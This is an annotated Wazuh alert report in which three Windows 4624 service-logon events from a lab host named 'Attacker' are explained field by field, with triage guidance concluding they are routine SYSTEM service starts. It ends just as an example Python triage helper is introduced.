rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK Good Practice Guide 13 (protective monitoring) control IDs. Compliance tag only, not a detection signal.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.392345
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Every Security‑log audit event (4624, 4625, 4672, 4688, ...) carries this name.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of Microsoft-Windows-Security-Auditing, identical on every host; a safe exact‑match filter where the provider name is localised.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = successful logon; its failure twin is 4625, the logoff 4634, and 4672 marks special privileges assigned to the same logon ID.

data.win.system.version:  3
Schema version of the 4624 template. Later versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token, Remote Credential Guard); match on field names, not positions, when agents run mixed Windows builds.

data.win.system.level:  0
Windows event level. Security audit events are always 0 (Log Always); success vs failure is carried by keywords and severityValue instead.

data.win.system.task:  12544
Windows task category. 12544 = Logon, the category of 4624/4625; Logoff events carry 12545.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit flags set by Windows. 0x8020000000000000 = Audit Success, 0x8010000000000000 = Audit Failure; the quick filter, since level is always 0 on Security.

data.win.system.systemTime:  2025-04-20T01:52:57.5252040Z
Time the endpoint wrote the event (UTC). Here it is 2025‑04‑20, more than four days before the alert timestamp, so the agent forwarded a backlog or the clocks disagree. Build the timeline on this value, not on timestamp.

data.win.system.eventRecordID:  43720
Incremental record number in the Security log, handy for timeline order. IDs skipped between consecutive alerts in this report (43719, 43721) were logged but produced no alert or were not forwarded; pull them from the host when reconstructing.

data.win.system.processID:  792
PID of the process that logged the event, i.e. lsass.exe, which writes every Security audit. Not the process that performed the logon; that is eventdata.processId.

data.win.system.threadID:  4968
Thread inside that logging process. Only useful for ordering records written in the same instant.

data.win.system.channel:  Security
Event log the record lives in. Security is readable only by SYSTEM/Administrators, so the agent needs those rights; a host that stops sending Security events is itself a finding.

data.win.system.computer:  Attacker
Host that wrote the event. Should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Textual severity. On the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; the failure twin of 4624 is 4625.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered event text: every eventdata.* value plus Microsoft's standard description of 4624. Query on the parsed fields; read this when a field is left as an unresolved %%code.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, identical on every Windows host.

data.win.eventdata.subjectUserName:  ATTACKER$
Requesting account. The trailing $ marks a computer account, so this is the host itself (agent.name Attacker), not a human user.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain‑joined, so there are no DC‑side events (4768/4769/4776) to correlate with.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3E7 (999) is the fixed SYSTEM session on every host; 0x3E4 is NETWORK SERVICE and 0x3E5 LOCAL SERVICE. Pivot on this value to see what that session did (4688, 4672, 4634).

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on (the New Logon block). LocalSystem again: SYSTEM requesting a logon as SYSTEM is a service start, not a change of privilege.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. For human logons this is the username to pivot on; here it is the built‑in SYSTEM account.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the new logon. NT AUTHORITY is the pseudo‑domain of the built‑in accounts (SYSTEM, LOCAL SERVICE, NETWORK SERVICE).

data.win.eventdata.targetLogonId:  0x3e7
Session ID assigned to the new logon; the matching 4634/4647 logoff carries the same value. It equals subjectLogonId here, so no new session was created.

data.win.eventdata.logonType:  5
How the account logged on. 5 = Service: the Service Control Manager starting a service under its configured account. Types that deserve scrutiny: 2 Interactive, 3 Network from a non‑local source, 9 NewCredentials (runas /netonly, also the pass‑the‑hash pattern), 10 RemoteInteractive (RDP), 11 CachedInteractive.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that handled the request. Advapi = a local LogonUser() call (services.exe starting a service, runas, scheduled tasks). Console logons show User32; network ones Kerberos or NtLmSsp.

data.win.eventdata.authenticationPackageName:  Negotiate
SSPI package used. Negotiate picks Kerberos when it can and falls back to NTLM; on a non‑domain host with a local SYSTEM logon it carries no signal. NTLM where Kerberos should have worked is the interesting case.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Ties this logon to the Kerberos ticket event (4769) on the DC. All zeros = no Kerberos ticket involved, expected for a local logon.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for the logon (128 for Kerberos or NTLMv2). 0 means no session key was requested, normal for a local service logon; it is not a weak‑key or downgrade indicator here.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772. Match it against the services.exe PID in 4688 / Sysmon 1 from the same boot.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Process that requested the logon. services.exe (the Service Control Manager) creating a SYSTEM type‑5 logon is the textbook service start. Any other binary producing a SYSTEM logon (cmd.exe, powershell.exe, something outside System32) is worth a look.

data.win.eventdata.impersonationLevel:  %%1833
Unresolved message‑table code; the message text renders it as Impersonation Level: Impersonation (the token can act as the user on this host but cannot be forwarded to another). Delegation on a service logon would be the one to question.

data.win.eventdata.virtualAccount:  %%1843
Unresolved code; the message text renders it as Virtual Account: No. Yes would mean a per‑service NT SERVICE\<name> identity rather than a real account.

data.win.eventdata.targetLinkedLogonId:  0x0
For UAC split tokens, the logon ID of the paired session (filtered vs elevated half). 0x0 = no linked session, as for any non‑interactive or SYSTEM logon.

data.win.eventdata.elevatedToken:  %%1842
Unresolved code; the message text renders it as Elevated Token: Yes, i.e. the session holds full administrative rights with no UAC filtering. Expected for SYSTEM. For an admin's interactive logon the elevated and filtered halves each get their own 4624, tied together by targetLinkedLogonId.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.420+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.420+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast. T1078 is stamped on every successful‑logon rule, so here it is a label, not a signal: logon type, target account and source decide.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK Good Practice Guide 13 (protective monitoring) control IDs. Compliance tag only, not a detection signal.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.399681
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Every Security‑log audit event (4624, 4625, 4672, 4688, ...) carries this name.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of Microsoft-Windows-Security-Auditing, identical on every host; a safe exact‑match filter where the provider name is localised.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = successful logon; its failure twin is 4625, the logoff 4634, and 4672 marks special privileges assigned to the same logon ID.

data.win.system.version:  3
Schema version of the 4624 template. Later versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token, Remote Credential Guard); match on field names, not positions, when agents run mixed Windows builds.

data.win.system.level:  0
Windows event level. Security audit events are always 0 (Log Always); success vs failure is carried by keywords and severityValue instead.

data.win.system.task:  12544
Windows task category. 12544 = Logon, the category of 4624/4625; Logoff events carry 12545.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit flags set by Windows. 0x8020000000000000 = Audit Success, 0x8010000000000000 = Audit Failure; the quick filter, since level is always 0 on Security.

data.win.system.systemTime:  2025-04-20T01:53:07.9865975Z
Time the endpoint wrote the event (UTC). Here it is 2025‑04‑20, more than four days before the alert timestamp, so the agent forwarded a backlog or the clocks disagree. Build the timeline on this value, not on timestamp.

data.win.system.eventRecordID:  43722
Incremental record number in the Security log, handy for timeline order. IDs skipped between consecutive alerts in this report (43719, 43721) were logged but produced no alert or were not forwarded; pull them from the host when reconstructing.

data.win.system.processID:  792
PID of the process that logged the event, i.e. lsass.exe, which writes every Security audit. Not the process that performed the logon; that is eventdata.processId.

data.win.system.threadID:  888
Thread inside that logging process. Only useful for ordering records written in the same instant.

data.win.system.channel:  Security
Event log the record lives in. Security is readable only by SYSTEM/Administrators, so the agent needs those rights; a host that stops sending Security events is itself a finding.

data.win.system.computer:  Attacker
Host that wrote the event. Should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Textual severity. On the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; the failure twin of 4624 is 4625.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered event text: every eventdata.* value plus Microsoft's standard description of 4624. Query on the parsed fields; read this when a field is left as an unresolved %%code.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, identical on every Windows host.

data.win.eventdata.subjectUserName:  ATTACKER$
Requesting account. The trailing $ marks a computer account, so this is the host itself (agent.name Attacker), not a human user.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain‑joined, so there are no DC‑side events (4768/4769/4776) to correlate with.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3E7 (999) is the fixed SYSTEM session on every host; 0x3E4 is NETWORK SERVICE and 0x3E5 LOCAL SERVICE. Pivot on this value to see what that session did (4688, 4672, 4634).

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on (the New Logon block). LocalSystem again: SYSTEM requesting a logon as SYSTEM is a service start, not a change of privilege.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. For human logons this is the username to pivot on; here it is the built‑in SYSTEM account.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the new logon. NT AUTHORITY is the pseudo‑domain of the built‑in accounts (SYSTEM, LOCAL SERVICE, NETWORK SERVICE).

data.win.eventdata.targetLogonId:  0x3e7
Session ID assigned to the new logon; the matching 4634/4647 logoff carries the same value. It equals subjectLogonId here, so no new session was created.

data.win.eventdata.logonType:  5
How the account logged on. 5 = Service: the Service Control Manager starting a service under its configured account. Types that deserve scrutiny: 2 Interactive, 3 Network from a non‑local source, 9 NewCredentials (runas /netonly, also the pass‑the‑hash pattern), 10 RemoteInteractive (RDP), 11 CachedInteractive.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that handled the request. Advapi = a local LogonUser() call (services.exe starting a service, runas, scheduled tasks). Console logons show User32; network ones Kerberos or NtLmSsp.

data.win.eventdata.authenticationPackageName:  Negotiate
SSPI package used. Negotiate picks Kerberos when it can and falls back to NTLM; on a non‑domain host with a local SYSTEM logon it carries no signal. NTLM where Kerberos should have worked is the interesting case.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Ties this logon to the Kerberos ticket event (4769) on the DC. All zeros = no Kerberos ticket involved, expected for a local logon.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for the logon (128 for Kerberos or NTLMv2). 0 means no session key was requested, normal for a local service logon; it is not a weak‑key or downgrade indicator here.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772. Match it against the services.exe PID in 4688 / Sysmon 1 from the same boot.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Process that requested the logon. services.exe (the Service Control Manager) creating a SYSTEM type‑5 logon is the textbook service start. Any other binary producing a SYSTEM logon (cmd.exe, powershell.exe, something outside System32) is worth a look.

data.win.eventdata.impersonationLevel:  %%1833
Unresolved message‑table code; the message text renders it as Impersonation Level: Impersonation (the token can act as the user on this host but cannot be forwarded to another). Delegation on a service logon would be the one to question.

data.win.eventdata.virtualAccount:  %%1843
Unresolved code; the message text renders it as Virtual Account: No. Yes would mean a per‑service NT SERVICE\<name> identity rather than a real account.

data.win.eventdata.targetLinkedLogonId:  0x0
For UAC split tokens, the logon ID of the paired session (filtered vs elevated half). 0x0 = no linked session, as for any non‑interactive or SYSTEM logon.

data.win.eventdata.elevatedToken:  %%1842
Unresolved code; the message text renders it as Elevated Token: Yes, i.e. the session holds full administrative rights with no UAC filtering. Expected for SYSTEM. For an admin's interactive logon the elevated and filtered halves each get their own 4624, tied together by targetLinkedLogonId.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.532+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts
What this alert actually shows: the New Logon is SYSTEM (S‑1‑5‑18) with Logon Type 5 (Service), requested by services.exe, and the workstation, source address and port are all empty. That is the Service Control Manager starting a service under LocalSystem, which is also why rule.firedtimes is already at 40. Identify the service that started (System log 7036, or 4697 / 7045 if one was newly installed) rather than treating the logon itself as the intrusion; the T1078 tag comes from rule 60106, not from anything specific in this event.

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.532+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK GPG 13 (Protective Monitoring) control mapping – same family as the PCI / NIST / HIPAA tags around it, useful for compliance reporting, not for triage.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.407015
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft‑Windows‑Security‑Auditing is the Security log; what it records is only as complete as the host's audit policy.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of that provider (this value is always Security‑Auditing). Filter on it rather than on the display name when a decoder mangles names.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
Schema version of the event template. Newer versions add fields (4624, for example, gained Elevated Token and Virtual Account); parsers built for an older layout silently drop them.

data.win.system.level:  0
Event level. Security‑log events are always 0 (LogAlways): success versus failure lives in keywords / severityValue, not here.

data.win.system.task:  12544
Task category. 12544 = Logon, the audit subcategory 4624 belongs to; use it to group events by subcategory.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:30.0318323Z
Time the endpoint wrote the event on its own clock (UTC). Compare with timestamp above: the host says 2025‑04‑20 but the manager received it on 2025‑04‑24, so either the host clock was off or delivery was delayed – order events by eventRecordID, not by wall clock.

data.win.system.eventRecordID:  43726
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the event. Security‑Auditing logon events are written by lsass.exe, so 792 is LSASS on this host – not the process named in eventdata.

data.win.system.threadID:  13300
Thread inside that process. Forensics only.

data.win.system.channel:  Security
Log the event lives in. Security depends on audit policy being enabled; Sysmon and PowerShell events arrive on their own channels.

data.win.system.computer:  Attacker
Hostname as the event writer saw it. Should match agent.name (it does here); a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Text severity. For the Security log this is AUDIT_SUCCESS or AUDIT_FAILURE; other channels use INFO / WARNING / ERROR. A successful audit is still a success for the attacker if the action was theirs.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered message: the same eventdata fields plus Microsoft's explanatory text. Worth reading once because it expands the %%NNNN codes (Impersonation Level: Impersonation, Virtual Account: No, Elevated Token: Yes) and shows the empty network fields; for pivots, use the structured fields below.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon (the Subject). S‑1‑5‑18 is LocalSystem, so a system component asked for this session.

data.win.eventdata.subjectUserName:  ATTACKER$
Name of the requester. A trailing $ is a computer account – the host itself, which is what LocalSystem services show up as.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means this host is not domain‑joined, so there is no DC‑side 4768/4769 to correlate against.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3E7 (999) is the permanent SYSTEM session that exists from boot and never logs off.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account the new session was created for (the New Logon). S‑1‑5‑18 is the well‑known LocalSystem SID, so this is a system component, not a user.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. Read it together with logonType and processName to decide whether that is normal.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the logged‑on account. NT AUTHORITY is the pseudo‑domain for built‑in accounts (SYSTEM, LOCAL SERVICE, NETWORK SERVICE).

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session – the pivot key for every 4672/4688/4634 that follows. Subject and target both 0x3E7 means the service was attached to the existing SYSTEM session rather than given a fresh one.

data.win.eventdata.logonType:  5
How the logon happened. 5 = Service: the Service Control Manager started a service under this account. Others to know: 2 interactive, 3 network (SMB, WinRM), 4 batch (scheduled task), 7 unlock, 9 NewCredentials (runas /netonly, a pass‑the‑hash footprint), 10 RemoteInteractive (RDP), 11 cached credentials.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that made the request. Advapi is the LogonUser API path used by services, scheduled tasks and runas; User32 is console logon, NtLmSsp and Kerberos are network, Winlogon is the shell, Schannel is TLS client certificates.

data.win.eventdata.authenticationPackageName:  Negotiate
Authentication package. Negotiate picks Kerberos when it can and falls back to NTLM; NTLM showing up explicitly on a domain‑joined host is worth a second look.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
GUID that ties this logon to the KDC's 4769 on a domain controller. All zeros = no Kerberos ticket was involved (local or non‑Kerberos logon), so there is nothing to correlate.

data.win.eventdata.keyLength:  0
Length in bits of the NTLM session key. 128 is normal NTLM, 56 means legacy crypto, and 0 means no session key was requested – always the case for Kerberos and for local service logons like this one, so 0 here is not a downgrade.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772 decimal. Match it to processName, and to a 4688 if you need its parent.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Image that requested the logon. services.exe (the Service Control Manager) with logon type 5 is the textbook service start; any other image asking for a SYSTEM logon is the thing to chase.

data.win.eventdata.impersonationLevel:  %%1833
Resource‑string index; the rendered message expands %%1833 to Impersonation. Impersonation lets the process act as the account on this host; Delegation would also let it reach remote systems as that account.

data.win.eventdata.virtualAccount:  %%1843
Resource‑string index; %%1843 expands to No in the message. Yes would mean a per‑service virtual account (NT SERVICE\<name>) instead of a shared built‑in one.

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the UAC split‑token twin session. 0x0 = no linked session, expected for SYSTEM and service accounts.

data.win.eventdata.elevatedToken:  %%1842
Resource‑string index; %%1842 expands to Yes in the message, so the new session holds a full administrative token. Expected for SYSTEM; for an ordinary user it means they logged on with admin rights.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
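A triage helper for the 4624 fields above, added here as an example (it is not SOCscribe or Wazuh code). It parses both timestamp formats that appear on this page, reports the gap between the manager's timestamp and the endpoint's systemTime, and classifies the logon from logonType, targetUserSid, processName and ipAddress, so the routine services.exe / SYSTEM / type 5 pattern is labelled as such while network, RDP and NewCredentials logons are flagged for review. SAMPLE_4624 is constructed from this report's fields; the verdict labels, the five‑minute skew threshold and the contrast case (user jdoe from 192.168.6.50) are assumptions of the example.

```python
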